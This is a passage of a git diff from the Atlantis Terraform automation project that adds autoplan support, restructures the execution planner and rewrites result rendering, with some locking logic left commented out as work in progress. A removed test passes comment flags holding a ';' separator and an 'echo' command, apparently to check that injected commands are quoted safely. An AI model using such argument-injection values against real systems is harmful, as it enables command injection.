+ +## Backwards Incompatibilities / Notes: + +## Downloads + +## Docker + + # v0.3.10 ## Features diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go index dbacf35a64..260a7fffa0 100644 --- a/server/events/apply_executor.go +++ b/server/events/apply_executor.go @@ -16,7 +16,6 @@ package events import ( "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" @@ -31,7 +30,7 @@ type ApplyExecutor struct { AtlantisWorkspace AtlantisWorkspace ProjectLocker *DefaultProjectLocker Webhooks webhooks.Sender - ExecutionPlanner *runtime.ExecutionPlanner + ExecutionPlanner *ExecutionPlanner } // Execute executes apply for the ctx. diff --git a/server/events/command_context.go b/server/events/command_context.go index 35a2a1b141..f986e43cc3 100644 --- a/server/events/command_context.go +++ b/server/events/command_context.go @@ -18,8 +18,8 @@ import ( "github.com/runatlantis/atlantis/server/logging" ) -// CommandContext represents the context of a command that came from a comment -// on a pull request. +// CommandContext represents the context of a command that should be executed +// for a pull request. type CommandContext struct { // BaseRepo is the repository that the pull request will be merged into. BaseRepo models.Repo diff --git a/server/events/command_handler.go b/server/events/command_handler.go index 047d5f936a..54c0ffa47f 100644 --- a/server/events/command_handler.go +++ b/server/events/command_handler.go @@ -137,8 +137,6 @@ func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging. 
} func (c *CommandHandler) run(ctx *CommandContext) { - log := c.buildLogger(ctx.BaseRepo.FullName, ctx.Pull.Num) - ctx.Log = log defer c.logPanics(ctx) if !c.AllowForkPRs && ctx.HeadRepo.Owner != ctx.BaseRepo.Owner { diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go index 2c9e1b0c1b..69e845197a 100644 --- a/server/events/comment_parser.go +++ b/server/events/comment_parser.go @@ -199,7 +199,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen } return CommentParseResult{ - Command: NewCommand(dir, extraArgs, name, verbose, workspace), + Command: NewCommand(dir, extraArgs, name, verbose, workspace, false), } } diff --git a/server/events/event_parser.go b/server/events/event_parser.go index cd3e36f5b3..742a765a99 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -42,10 +42,13 @@ type Command struct { Name CommandName Verbose bool Workspace string + // Autoplan is true if the command is a plan command being executed in an + // attempt to automatically run plan. + Autoplan bool } // NewCommand constructs a Command, setting all missing fields to defaults. -func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string) *Command { +func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, autoplan bool) *Command { // If dir was an empty string, this will return '.'. validDir := path.Clean(dir) if validDir == "/" { @@ -60,14 +63,17 @@ func NewCommand(dir string, flags []string, name CommandName, verbose bool, work Name: name, Verbose: verbose, Workspace: workspace, + Autoplan: autoplan, } } type EventParsing interface { ParseGithubIssueCommentEvent(comment *github.IssueCommentEvent) (baseRepo models.Repo, user models.User, pullNum int, err error) + // ParseGithubPull returns the pull request and head repo. 
ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) - ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, error) + // ParseGitlabMergeEvent returns the pull request, base repo and head repo. + ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) ParseGitlabMergeCommentEvent(event gitlab.MergeCommentEvent) (baseRepo models.Repo, headRepo models.Repo, user models.User, err error) ParseGitlabMergeRequest(mr *gitlab.MergeRequest, baseRepo models.Repo) models.PullRequest } @@ -154,7 +160,7 @@ func (e *EventParser) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, e return models.NewRepo(models.Github, ghRepo.GetFullName(), ghRepo.GetCloneURL(), e.GithubUser, e.GithubToken) } -func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, error) { +func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) { modelState := models.Closed if event.ObjectAttributes.State == gitlabPullOpened { modelState = models.Open @@ -162,7 +168,15 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul // GitLab also has a "merged" state, but we map that to Closed so we don't // need to check for it. 
- repo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken) + baseRepo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken) + if err != nil { + return models.PullRequest{}, models.Repo{}, models.Repo{}, err + } + headRepo, err := models.NewRepo(models.Gitlab, event.ObjectAttributes.Source.PathWithNamespace, event.ObjectAttributes.Source.GitHTTPURL, e.GitlabUser, e.GitlabToken) + if err != nil { + return models.PullRequest{}, models.Repo{}, models.Repo{}, err + } + pull := models.PullRequest{ URL: event.ObjectAttributes.URL, Author: event.User.Username, @@ -170,10 +184,10 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul HeadCommit: event.ObjectAttributes.LastCommit.ID, Branch: event.ObjectAttributes.SourceBranch, State: modelState, - BaseRepo: repo, + BaseRepo: baseRepo, } - return pull, repo, err + return pull, baseRepo, headRepo, err } // ParseGitlabMergeCommentEvent creates Atlantis models out of a GitLab event. 
diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go index dbd4b515e4..2e9b7e4346 100644 --- a/server/events/event_parser_test.go +++ b/server/events/event_parser_test.go @@ -156,7 +156,7 @@ func TestParseGitlabMergeEvent(t *testing.T) { var event *gitlab.MergeEvent err := json.Unmarshal([]byte(mergeEventJSON), &event) Ok(t, err) - pull, repo, err := parser.ParseGitlabMergeEvent(*event) + pull, repo, _, err := parser.ParseGitlabMergeEvent(*event) Ok(t, err) expRepo := models.Repo{ @@ -185,7 +185,7 @@ func TestParseGitlabMergeEvent(t *testing.T) { t.Log("If the state is closed, should set field correctly.") event.ObjectAttributes.State = "closed" - pull, _, err = parser.ParseGitlabMergeEvent(*event) + pull, _, _, err = parser.ParseGitlabMergeEvent(*event) Ok(t, err) Equals(t, models.Closed, pull.State) } @@ -283,19 +283,19 @@ func TestNewCommand_CleansDir(t *testing.T) { for _, c := range cases { t.Run(c.Dir, func(t *testing.T) { - cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace") + cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", false) Equals(t, c.ExpDir, cmd.Dir) }) } } func TestNewCommand_EmptyWorkspace(t *testing.T) { - cmd := events.NewCommand("dir", nil, events.Plan, false, "") + cmd := events.NewCommand("dir", nil, events.Plan, false, "", false) Equals(t, "default", cmd.Workspace) } func TestNewCommand_AllFieldsSet(t *testing.T) { - cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace") + cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", false) Equals(t, events.Command{ Workspace: "workspace", Dir: "dir", diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go index eee10f5890..e6e928c24b 100644 --- a/server/events/execution_planner.go +++ b/server/events/execution_planner.go @@ -1,4 +1,4 @@ -package runtime +package events import ( "fmt" @@ -6,7 +6,8 @@ import ( "path/filepath" 
"github.com/hashicorp/go-version" - "github.com/runatlantis/atlantis/server/events" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" ) @@ -19,25 +20,27 @@ type ExecutionPlanner struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version ParserValidator *yaml.ParserValidator - ProjectFinder events.ProjectFinder + ProjectFinder ProjectFinder } type TerraformExec interface { RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) } -func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (PlanStage, error) { +func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (runtime.PlanStage, error) { defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) if err != nil { - return nil, err + return runtime.PlanStage{}, err } - return &PlanStage{ - Steps: steps, + return runtime.PlanStage{ + Steps: steps, + Workspace: workspace, + ProjectPath: relProjectPath, }, nil } -func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]PlanStage, error) { +func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]runtime.PlanStage, error) { // If there is an atlantis.yaml // -> Get modified files from pull request. 
// -> For each project, if autoplan == true && files match @@ -54,21 +57,23 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu // was modified in the pull request. if os.IsNotExist(err) { projects := s.ProjectFinder.DetermineProjects(log, modifiedFiles, repoFullName, repoDir) - var stages []PlanStage + var stages []runtime.PlanStage for _, p := range projects { // NOTE: we use the default workspace because we don't know about // other workspaces. If users want to plan for other workspaces they // need to use a config file. - steps := s.defaultPlanSteps(log, repoDir, defaultWorkspace, p.Path, nil, username) - stages = append(stages, PlanStage{ - Steps: steps, + steps := s.defaultPlanSteps(log, repoDir, models.DefaultWorkspace, p.Path, nil, username) + stages = append(stages, runtime.PlanStage{ + Steps: steps, + Workspace: models.DefaultWorkspace, + ProjectPath: p.Path, }) } return stages, nil } // Else we run plan according to the config file. - var stages []PlanStage + var stages []runtime.PlanStage for _, p := range config.Projects { if s.shouldAutoplan(p.AutoPlan, modifiedFiles) { // todo @@ -79,25 +84,25 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu } func (s *ExecutionPlanner) shouldAutoplan(autoplan yaml.AutoPlan, modifiedFiles []string) bool { - + return true } func (s *ExecutionPlanner) getSteps() { } -func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { +func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*runtime.ApplyStage, error) { defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, 
extraCommentArgs, username, defaults) if err != nil { return nil, err } - return &ApplyStage{ + return &runtime.ApplyStage{ Steps: steps, }, nil } -func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) { +func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []runtime.Step) ([]runtime.Step, error) { config, err := s.ParserValidator.ReadConfig(repoDir) // If there's no config file, use defaults. @@ -129,7 +134,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge // We have a workflow defined, so now we need to build it. meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - var steps []Step + var steps []runtime.Step var stepsConfig []yaml.StepConfig if stageName == PlanStageName { stepsConfig = workflow.Plan.Steps @@ -137,25 +142,25 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge stepsConfig = workflow.Apply.Steps } for _, stepConfig := range stepsConfig { - var step Step + var step runtime.Step switch stepConfig.StepType { case "init": - step = &InitStep{ + step = &runtime.InitStep{ Meta: meta, ExtraArgs: stepConfig.ExtraArgs, } case "plan": - step = &PlanStep{ + step = &runtime.PlanStep{ Meta: meta, ExtraArgs: stepConfig.ExtraArgs, } case "apply": - step = &ApplyStep{ + step = &runtime.ApplyStep{ Meta: meta, ExtraArgs: stepConfig.ExtraArgs, } case "run": - step = &RunStep{ + step = &runtime.RunStep{ Meta: meta, Commands: stepConfig.Run, } @@ -170,8 +175,8 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge return defaults, nil } -func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, 
relProjectPath string, extraCommentArgs []string, username string) StepMeta { - return StepMeta{ +func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) runtime.StepMeta { + return runtime.StepMeta{ Log: log, Workspace: workspace, AbsolutePath: filepath.Join(repoDir, relProjectPath), @@ -184,23 +189,23 @@ func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, } } -func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step { +func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step { meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - return []Step{ - &InitStep{ + return []runtime.Step{ + &runtime.InitStep{ ExtraArgs: nil, Meta: meta, }, - &PlanStep{ + &runtime.PlanStep{ ExtraArgs: nil, Meta: meta, }, } } -func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step { +func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step { meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - return []Step{ - &ApplyStep{ + return []runtime.Step{ + &runtime.ApplyStep{ ExtraArgs: nil, Meta: meta, }, diff --git a/server/events/execution_planner_test.go b/server/events/execution_planner_test.go index 9c3fd5ac4d..7b6fc7ac97 100644 --- a/server/events/execution_planner_test.go +++ b/server/events/execution_planner_test.go @@ -1,4 +1,4 @@ -package runtime_test +package events_test import 
( "io/ioutil" @@ -6,6 +6,7 @@ import ( "testing" "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/logging" . "github.com/runatlantis/atlantis/testing" @@ -15,7 +16,7 @@ import ( func TestBuildStage_NoConfigFile(t *testing.T) { var defaultTFVersion *version.Version var terraformExecutor runtime.TerraformExec - e := runtime.ExecutionPlanner{ + e := events.ExecutionPlanner{ DefaultTFVersion: defaultTFVersion, TerraformExecutor: terraformExecutor, } @@ -50,7 +51,7 @@ func TestBuildStage_NoConfigFile(t *testing.T) { Meta: meta, }, }, - }, *planStage) + }, planStage) }) // Then the apply stage. @@ -70,7 +71,7 @@ func TestBuildStage_NoConfigFile(t *testing.T) { func TestBuildStage(t *testing.T) { var defaultTFVersion *version.Version var terraformExecutor runtime.TerraformExec - e := runtime.ExecutionPlanner{ + e := events.ExecutionPlanner{ DefaultTFVersion: defaultTFVersion, TerraformExecutor: terraformExecutor, } @@ -131,7 +132,7 @@ workflows: Meta: meta, }, }, - }, *planStage) + }, planStage) }) t.Run("apply stage for project without config", func(t *testing.T) { @@ -171,7 +172,7 @@ workflows: Commands: []string{"echo", "hi"}, }, }, - }, *planStage) + }, planStage) }) t.Run("apply stage for custom config", func(t *testing.T) { diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go index 978cc7776a..f91a45a1f1 100644 --- a/server/events/markdown_renderer.go +++ b/server/events/markdown_renderer.go @@ -18,6 +18,8 @@ import ( "fmt" "strings" "text/template" + + "github.com/Masterminds/sprig" ) // MarkdownRenderer renders responses as markdown. @@ -44,10 +46,16 @@ type FailureData struct { // ResultData is data about a successful response. 
type ResultData struct { - Results map[string]string + Results []ProjectResultTmplData CommonData } +type ProjectResultTmplData struct { + Workspace string + Dir string + Rendered string +} + // Render formats the data into a markdown string. // nolint: interfacer func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool) string { @@ -63,10 +71,15 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log } func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, common CommonData) string { - results := make(map[string]string) + var resultsTmplData []ProjectResultTmplData + for _, result := range pathResults { + resultData := ProjectResultTmplData{ + Workspace: result.Workspace, + Dir: result.Path, + } if result.Error != nil { - results[result.Path] = m.renderTemplate(errTmpl, struct { + resultData.Rendered = m.renderTemplate(errTmpl, struct { Command string Error string }{ @@ -74,7 +87,7 @@ func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, com Error: result.Error.Error(), }) } else if result.Failure != "" { - results[result.Path] = m.renderTemplate(failureTmpl, struct { + resultData.Rendered = m.renderTemplate(failureTmpl, struct { Command string Failure string }{ @@ -82,21 +95,22 @@ func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, com Failure: result.Failure, }) } else if result.PlanSuccess != nil { - results[result.Path] = m.renderTemplate(planSuccessTmpl, *result.PlanSuccess) + resultData.Rendered = m.renderTemplate(planSuccessTmpl, *result.PlanSuccess) } else if result.ApplySuccess != "" { - results[result.Path] = m.renderTemplate(applySuccessTmpl, struct{ Output string }{result.ApplySuccess}) + resultData.Rendered = m.renderTemplate(applySuccessTmpl, struct{ Output string }{result.ApplySuccess}) } else { - results[result.Path] = "Found no template. This is a bug!" + resultData.Rendered = "Found no template. 
This is a bug!" } + resultsTmplData = append(resultsTmplData, resultData) } var tmpl *template.Template - if len(results) == 1 { + if len(resultsTmplData) == 1 { tmpl = singleProjectTmpl } else { tmpl = multiProjectTmpl } - return m.renderTemplate(tmpl, ResultData{results, common}) + return m.renderTemplate(tmpl, ResultData{resultsTmplData, common}) } func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interface{}) string { @@ -107,15 +121,15 @@ func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interfac return buf.String() } -var singleProjectTmpl = template.Must(template.New("").Parse("{{ range $result := .Results }}{{$result}}{{end}}\n" + logTmpl)) -var multiProjectTmpl = template.Must(template.New("").Parse( - "Ran {{.Command}} in {{ len .Results }} directories:\n" + - "{{ range $path, $result := .Results }}" + - " * `{{$path}}`\n" + +var singleProjectTmpl = template.Must(template.New("").Parse("{{$result := index .Results 0}}Ran {{.Command}} in dir: `{{$result.Dir}}` workspace: `{{$result.Workspace}}`\n{{$result.Rendered}}\n" + logTmpl)) +var multiProjectTmpl = template.Must(template.New("").Funcs(sprig.TxtFuncMap()).Parse( + "Ran {{.Command}} for {{ len .Results }} projects:\n" + + "{{ range $result := .Results }}" + + "1. path: `{{$result.Dir}} workspace: `{{$result.Workspace}}`\n" + "{{end}}\n" + - "{{ range $path, $result := .Results }}" + - "## {{$path}}/\n" + - "{{$result}}\n" + + "{{ range $i, $result := .Results }}" + + "### {{add $i 1}}. 
workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" + + "{{$result.Rendered}}\n" + "---\n{{end}}" + logTmpl)) var planSuccessTmpl = template.Must(template.New("").Parse( diff --git a/server/events/mocks/mock_event_parsing.go b/server/events/mocks/mock_event_parsing.go index e88b581dce..007f823a40 100644 --- a/server/events/mocks/mock_event_parsing.go +++ b/server/events/mocks/mock_event_parsing.go @@ -80,12 +80,13 @@ func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models return ret0, ret1 } -func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, error) { +func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) { params := []pegomock.Param{event} - result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) var ret0 models.PullRequest var ret1 models.Repo - var ret2 error + var ret2 models.Repo + var ret3 error if len(result) != 0 { if result[0] != nil { ret0 = result[0].(models.PullRequest) @@ -94,10 +95,13 @@ func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) ret1 = result[1].(models.Repo) } if result[2] != nil { - ret2 = result[2].(error) + ret2 = result[2].(models.Repo) + } + if result[3] != nil { + ret3 = result[3].(error) } } - return ret0, ret1, ret2 + return ret0, ret1, ret2, ret3 } func (mock *MockEventParsing) ParseGitlabMergeCommentEvent(event go_gitlab.MergeCommentEvent) (models.Repo, models.Repo, models.User, 
error) { diff --git a/server/events/models/models.go b/server/events/models/models.go index 7344fd28e2..1d8d72453f 100644 --- a/server/events/models/models.go +++ b/server/events/models/models.go @@ -26,6 +26,10 @@ import ( "github.com/pkg/errors" ) +// DefaultWorkspace is the default Terraform workspace for both Atlantis and +// Terraform. +const DefaultWorkspace = "default" + // Repo is a VCS repository. type Repo struct { // FullName is the owner and repo name separated @@ -123,6 +127,7 @@ const ( ) // User is a VCS user. +// During an autoplan, the user will be the Atlantis API user. type User struct { Username string } diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go index 7e92917551..4dd221422f 100644 --- a/server/events/plan_executor.go +++ b/server/events/plan_executor.go @@ -16,8 +16,8 @@ package events import ( "fmt" + "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/locking" - "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" @@ -39,7 +39,7 @@ type PlanExecutor struct { Workspace AtlantisWorkspace ProjectFinder ProjectFinder ProjectLocker ProjectLocker - ExecutionPlanner *runtime.ExecutionPlanner + ExecutionPlanner *ExecutionPlanner LockURLGenerator LockURLGenerator } @@ -56,32 +56,54 @@ func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse { return CommandResponse{Error: err} } - stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) - if err != nil { - return CommandResponse{Error: err} + var stages []runtime.PlanStage + if ctx.Command.Autoplan { + modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) + if err != nil { + return CommandResponse{Error: errors.Wrap(err, "getting modified files")} + } + stages, err = 
p.ExecutionPlanner.BuildAutoplanStages(ctx.Log, ctx.BaseRepo.FullName, cloneDir, ctx.User.Username, modifiedFiles) + if err != nil { + return CommandResponse{Error: err} + } + } else { + stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) + if err != nil { + return CommandResponse{Error: err} + } + stages = append(stages, stage) } - tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) - if err != nil { - return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} - } - if !tryLockResponse.LockAcquired { - return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} - } + var projectResults []ProjectResult + for _, stage := range stages { + projectResult := ProjectResult{ + Path: stage.ProjectPath, + Workspace: stage.Workspace, + } - out, err := stage.Run() - if err != nil { - // Plan failed so unlock the state. 
- if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil { - ctx.Log.Err("error unlocking state after plan error: %s", unlockErr) + // todo: this should be moved into the plan stage + //tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) + //if err != nil { + // return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} + //} + //if !tryLockResponse.LockAcquired { + // return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} + //} + // todo: endtodo + + out, err := stage.Run() + if err != nil { + //if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil { + // ctx.Log.Err("error unlocking state after plan error: %s", unlockErr) + //} + projectResult.Error = fmt.Errorf("%s\n%s", err.Error(), out) + } else { + projectResult.PlanSuccess = &PlanSuccess{ + TerraformOutput: out, + //LockURL: p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey), + } } - return CommandResponse{ProjectResults: []ProjectResult{{Error: fmt.Errorf("%s\n%s", err.Error(), out)}}} + projectResults = append(projectResults, projectResult) } - - return CommandResponse{ProjectResults: []ProjectResult{{ - PlanSuccess: &PlanSuccess{ - TerraformOutput: out, - LockURL: p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey), - }, - }}} + return CommandResponse{ProjectResults: projectResults} } diff --git a/server/events/plan_executor_test.go b/server/events/plan_executor_test.go index c9a209fe64..371aa9ec5c 100644 --- a/server/events/plan_executor_test.go +++ b/server/events/plan_executor_test.go @@ -13,276 +13,277 @@ // package events_test -import ( - "errors" - "testing" - - "github.com/mohae/deepcopy" - . 
"github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events" - "github.com/runatlantis/atlantis/server/events/locking" - lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks" - "github.com/runatlantis/atlantis/server/events/mocks" - "github.com/runatlantis/atlantis/server/events/models" - rmocks "github.com/runatlantis/atlantis/server/events/run/mocks" - tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks" - vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" - "github.com/runatlantis/atlantis/server/events/vcs/mocks/matchers" - "github.com/runatlantis/atlantis/server/logging" - . "github.com/runatlantis/atlantis/testing" -) - -var planCtx = events.CommandContext{ - Command: &events.Command{ - Name: events.Plan, - Workspace: "workspace", - Dir: "", - }, - Log: logging.NewNoopLogger(), - BaseRepo: models.Repo{}, - HeadRepo: models.Repo{}, - Pull: models.PullRequest{}, - User: models.User{ - Username: "anubhavmishra", - }, -} - -func TestExecute_ModifiedFilesErr(t *testing.T) { - t.Log("If GetModifiedFiles returns an error we return an error") - p, _, _ := setupPlanExecutorTest(t) - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn(nil, errors.New("err")) - r := p.Execute(&planCtx) - - Assert(t, r.Error != nil, "exp .Error to be set") - Equals(t, "getting modified files: err", r.Error.Error()) -} - -func TestExecute_NoModifiedProjects(t *testing.T) { - t.Log("If there are no modified projects we return a failure") - p, _, _ := setupPlanExecutorTest(t) - // We don't need to actually mock VCSClient.GetModifiedFiles because by - // default it will return an empty slice which is what we want for this test. 
- r := p.Execute(&planCtx) - - Equals(t, "No Terraform files were modified.", r.Failure) -} - -func TestExecute_CloneErr(t *testing.T) { - t.Log("If AtlantisWorkspace.Clone returns an error we return an error") - p, _, _ := setupPlanExecutorTest(t) - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) - When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).ThenReturn("", errors.New("err")) - r := p.Execute(&planCtx) - - Assert(t, r.Error != nil, "exp .Error to be set") - Equals(t, "err", r.Error.Error()) -} - -func TestExecute_DirectoryAndWorkspaceSet(t *testing.T) { - t.Log("Test that we run plan in the right directory and workspace if they're set") - p, runner, _ := setupPlanExecutorTest(t) - ctx := deepcopy.Copy(planCtx).(events.CommandContext) - ctx.Log = logging.NewNoopLogger() - ctx.Command.Dir = "dir1/dir2" - ctx.Command.Workspace = "workspace-flag" - - When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace-flag")). - ThenReturn("/tmp/clone-repo", nil) - When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "dir1/dir2"})). 
- ThenReturn(events.PreExecuteResult{ - LockResponse: locking.TryLockResponse{ - LockKey: "key", - }, - }) - r := p.Execute(&ctx) - - runner.VerifyWasCalledOnce().RunCommandWithVersion( - ctx.Log, - "/tmp/clone-repo/dir1/dir2", - []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/dir1/dir2/workspace-flag.tfplan", "-var", "atlantis_user=anubhavmishra"}, - nil, - "workspace-flag", - ) - Assert(t, len(r.ProjectResults) == 1, "exp one project result") - result := r.ProjectResults[0] - Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") - Equals(t, "", result.PlanSuccess.TerraformOutput) - Equals(t, "lockurl-key", result.PlanSuccess.LockURL) -} - -func TestExecute_AddedArgs(t *testing.T) { - t.Log("Test that we include extra-args added to the comment in the plan command") - p, runner, _ := setupPlanExecutorTest(t) - ctx := deepcopy.Copy(planCtx).(events.CommandContext) - ctx.Log = logging.NewNoopLogger() - ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""} - - 